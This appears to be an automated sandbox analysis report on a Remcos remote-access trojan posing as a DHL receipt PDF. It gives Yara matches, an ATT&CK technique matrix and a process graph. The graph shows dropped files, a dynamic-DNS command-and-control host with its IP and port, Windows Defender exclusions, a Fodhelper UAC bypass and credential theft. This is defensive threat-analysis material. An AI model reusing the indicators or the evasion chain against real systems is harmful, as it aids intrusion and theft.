Source: Yara match | File source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\trhrth\logs.dat, type: DROPPED
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: cmd.exe 0_2_2DA4569A
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | 1 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Software Packing | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 213 Application Layer Protocol | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Shared Modules | 1 Valid Accounts | 1 Valid Accounts | 1 Timestomp | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 12 Ingress Tool Transfer | Exfiltration Over Bluetooth | 1 Defacement
Email Addresses | DNS Server | Domain Accounts | 11 Native API | 21 Registry Run Keys / Startup Folder | 21 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 3 Credentials In Files | 1 System Service Discovery | SMB/Windows Admin Shares | 1 Email Collection | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 22 Command and Scripting Interpreter | 1 Scripting | 1 Abuse Elevation Control Mechanism | 1 File Deletion | 211 Input Capture | 1 System Network Connections Discovery | Distributed Component Object Model | 3 Clipboard Data | 1 Non-Standard Port | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | 2 Service Execution | 1 Windows Service | 1 Bypass User Account Control | 331 Masquerading | LSA Secrets | 4 File and Directory Discovery | SSH | 211 Input Capture | 1 Remote Access Software | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 11 Access Token Manipulation | 1 Valid Accounts | Cached Domain Credentials | 49 System Information Discovery | VNC | GUI Input Capture | 2 Non-Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Windows Service | 211 Disable or Modify Tools | DCSync | 1 System Owner/User Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | 522 Process Injection | 1 Deobfuscate/Decode Files or Information | Proc Filesystem | 1 Network Share Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Abuse Elevation Control Mechanism | /etc/passwd and /etc/shadow | 1 Query Registry | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 2 Obfuscated Files or Information | Network Sniffing | 271 Security Software Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Bypass User Account Control | Input Capture | 41 Virtualization/Sandbox Evasion | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 41 Virtualization/Sandbox Evasion | Keylogging | 4 Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | 11 Access Token Manipulation | GUI Input Capture | 1 Application Window Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service
Business Relationships | Server | Trusted Relationship | Visual Basic | Container Orchestration Job | Container Orchestration Job | 522 Process Injection | Web Portal Capture | 1 Remote System Discovery | Component Object Model and Distributed COM | Local Email Collection | Internal Proxy | Commonly Used Port | Direct Network Flood
Identify Business Tempo | Botnet | Hardware Additions | Python | Hypervisor | Process Injection | LNK Icon Smuggling | Credential API Hooking | 1 System Network Configuration Discovery | Exploitation of Remote Services | Remote Email Collection | External Proxy | Transfer Data to Cloud Account | Reflection Amplification
Behavior Graph ID: 1471440 | Sample: DHL119040 receipt document,... | Startdate: 11/07/2024 | Architecture: WINDOWS | Score: 100

Start (node 2)
  DNS/IP: jantasagasa.duckdns.org; ppeppa.db.files.1drv.com; 7 other IPs or domains
  Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 24 other signatures; Uses dynamic DNS services (jantasagasa.duckdns.org)
  Started: DHL119040 receipt document,pdf.exe (node 12); remcos.exe (node 17); remcos.exe (node 19); SystemSettingsAdminFlows.exe (node 21)

DHL119040 receipt document,pdf.exe (node 12)
  DNS/IP: dual-spov-0006.spov-msedge.net 13.107.137.11, 443, 49730, 49731 MICROSOFT-CORP-MSN-AS-BLOCKUS United States; l-0003.l-dc-msedge.net 13.107.43.12, 443, 49732, 49735 MICROSOFT-CORP-MSN-AS-BLOCKUS United States
  Dropped: C:\Users\Public\Libraries\yfkwifxL.pif (PE32); C:\ProgramData\Remcos\remcos.exe (PE32); C:\Users\Public\Lxfiwkfy.url (MS); C:\ProgramData\...\remcos.exe:Zone.Identifier (ASCII)
  Signatures: Detected Remcos RAT; Creates autostart registry keys with suspicious names; Creates multiple autostart registry keys; 3 other signatures
  Started: yfkwifxL.pif (node 23); remcos.exe (node 27); extrac32.exe (node 30)

yfkwifxL.pif (node 23)
  Dropped: C:\Users\user\AppData\Local\Temp\...\971F.bat (ASCII)
  Signatures: Detected unpacking (changes PE section rights)
  Started: cmd.exe (node 32)

remcos.exe (node 27)
  DNS/IP: jantasagasa.duckdns.org 23.227.203.18, 44577, 49736, 49737 HVC-ASUS United States; geoplugin.net 178.237.33.50, 49740, 80 ATOM86-ASATOM86NL Netherlands
  Dropped: C:\ProgramData\trhrth\logs.dat (data)
  Signatures: Detected Remcos RAT; Contains functionalty to change the wallpaper; Contains functionality to inject code into remote processes; 4 other signatures
  Started: remcos.exe (node 35); remcos.exe (node 37); remcos.exe (node 39); conhost.exe (node 41)

cmd.exe (node 32)
  Signatures: Drops executables to the windows directory (C:\Windows) and starts them; Adds a directory exclusion to Windows Defender
  Started: alpha.exe (node 43); alpha.exe (node 46); extrac32.exe (node 48); 15 other processes (node 51)

remcos.exe (node 35)
  Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)

remcos.exe (node 37)
  Signatures: Tries to harvest and steal browser information (history, passwords, etc)

alpha.exe (node 43)
  Signatures: Adds a directory exclusion to Windows Defender
  Started: xkn.exe (node 53)

alpha.exe (node 46)
  Signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks

extrac32.exe (node 48)
  Dropped: C:\Users\Public\alpha.exe (PE32+)
  Signatures: Drops PE files to the user root directory; Drops or copies cmd.exe with a different name (likely to bypass HIPS)

15 other processes (node 51)
  Signatures: Opens network shares
  Started: PING.EXE (node 56); extrac32.exe (node 59); extrac32.exe (node 62); 2 other processes (node 64)

xkn.exe (node 53)
  Signatures: Powershell is started from unusual location (likely to bypass HIPS); Adds a directory exclusion to Windows Defender; Reads the Security eventlog; Reads the System eventlog
  Started: alpha.exe (node 66)

PING.EXE (node 56)
  DNS/IP: 127.0.0.1 unknown unknown

extrac32.exe (node 59)
  Dropped: C:\Users\Public\ger.exe (PE32+)

extrac32.exe (node 62)
  Dropped: C:\Users\Public\xkn.exe (PE32+)

2 other processes (node 64)
  Dropped: C:\Windows \System32\per.exe (PE32+)

alpha.exe (node 66)
  Signatures: Adds a directory exclusion to Windows Defender
  Started: ger.exe (node 69)

ger.exe (node 69)
  Signatures: UAC bypass detected (Fodhelper)
